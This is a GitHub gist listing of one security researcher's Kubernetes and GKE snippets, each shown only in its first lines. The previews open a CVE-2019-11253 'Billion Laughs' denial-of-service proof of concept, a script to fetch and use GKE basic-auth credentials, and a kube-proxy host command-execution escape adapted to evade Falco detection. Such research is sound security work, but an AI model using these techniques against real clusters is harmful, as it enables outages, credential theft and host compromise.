Skip to content

Instantly share code, notes, and snippets.

View bgeesaman's full-sized avatar

Brad Geesaman bgeesaman

194 followers · 3 following
View GitHub Profile
@bgeesaman
bgeesaman / liam.txt
Created August 15, 2023 15:47
For Liam
:poop:
@bgeesaman
bgeesaman / k8s_honey_token.md
Created March 2, 2023 12:06
K8s_honey_token
layout title date categories tags image author published
post
Kubernetes Honey Token
2021-01-19
blog
kubernetes security honey token cloud jwt serviceaccount
/img/previews/honeyjar.jpeg
Brad Geesaman
true
@bgeesaman
bgeesaman / gendata.sh
Created July 15, 2021 21:33
Generates a few fake files to exercise various malware scanning engines
#!/usr/bin/env bash
set -eo pipefail
PARAMS=""
while (( "$#" )); do
case "$1" in
-d|--dest)
if [ -n "$2" ] && [ ${2:0:1} != "-" ]; then
DESTDIR=$2
@bgeesaman
bgeesaman / pod3.yaml
Last active December 21, 2019 02:10
apiVersion: v1
kind: Pod
metadata:
name: bradgeesaman
namespace: kube-system
labels:
app: bradgeesaman
spec:
containers:
- image: docker.io/library/busybox:1.28.4
@bgeesaman
bgeesaman / pod2.yaml
Last active December 21, 2019 02:14
apiVersion: v1
kind: Pod
metadata:
name: nginx5
namespace: lake
labels:
app: nginx5
spec:
containers:
- image: docker.io/library/busybox:1.28.4
@bgeesaman
bgeesaman / pod.yaml
Last active December 21, 2019 01:27
apiVersion: v1
kind: Pod
metadata:
name: nginx
namespace: lake
labels:
app: nginx
spec:
containers:
- image: docker.io/library/busybox:1.28.4
@bgeesaman
bgeesaman / CVE-2019-11253-poc.sh
Last active December 29, 2022 14:25
CVE-2019-11253 Kubernetes API Server YAML Parsing Remote Denial of Service PoC aka "Billion Laughs"
#!/usr/bin/env bash
# CVE-2019-11253
# https://github.com/kubernetes/kubernetes/issues/83253
# Shout out: @raesene for poc collab, @iancoldwater + @mauilion for
# HONKing inspiration and other guidance.
# Description: In Kubernetes 1.13 and below, the default configuration
# is that system:anonymous can request a selfsubjectaccessreview
# via mechanisms such as "kubectl auth can-i". This request can
# include POSTed YAML, and just the act of trying to parse it causes
@bgeesaman
bgeesaman / fetchgkecredsroles.sh
Last active July 30, 2019 13:19
Enumerates GCP IAM Roles with the ability to view Legacy Auth Credentials on GKE Clusters.
#!/usr/bin/env bash
ALL_ROLES="$(gcloud iam roles list --format=json | jq -r '.[].name')"
for i in $ALL_ROLES; do
CURRENT_ROLE="${i}"
CURRENT_ROLE_PERMS="$(gcloud iam roles describe ${i} --format=json | jq -r '.includedPermissions[]?' | egrep 'container.clusters.get$|container.clusters.list')"
if [[ ! -z "${CURRENT_ROLE_PERMS}" ]]; then
echo "${CURRENT_ROLE} has: "
@bgeesaman
bgeesaman / fetchbasic.sh
Last active October 31, 2020 01:00
Obtain GKE Basic Auth Credentials and use them
#!/usr/bin/env bash
CLUSTER_NAME="basicauth"
LOCATION="--zone us-central1-a"
#LOCATION="--region us-central1"
# Get cluster metadata
echo -n "Fetching cluster metadata..."
CLUSTER="$(gcloud container clusters describe ${CLUSTER_NAME} ${LOCATION} --format=json)"
echo "done."
@bgeesaman
bgeesaman / kphcme.sh
Last active March 21, 2021 00:45
GKE/Kube-proxy host command execution via kubectl exec
#!/usr/bin/env bash
# Credit: https://twitter.com/_fel1x
# poc: https://twitter.com/_fel1x/status/1151487051986087936
# Adapted to GKE/kube-proxy by: https://twitter.com/bradgeesaman
# and to avoid detection by Falco's default rules
read -r -d '' ESCAPE <<'EOF'
#!/bin/sh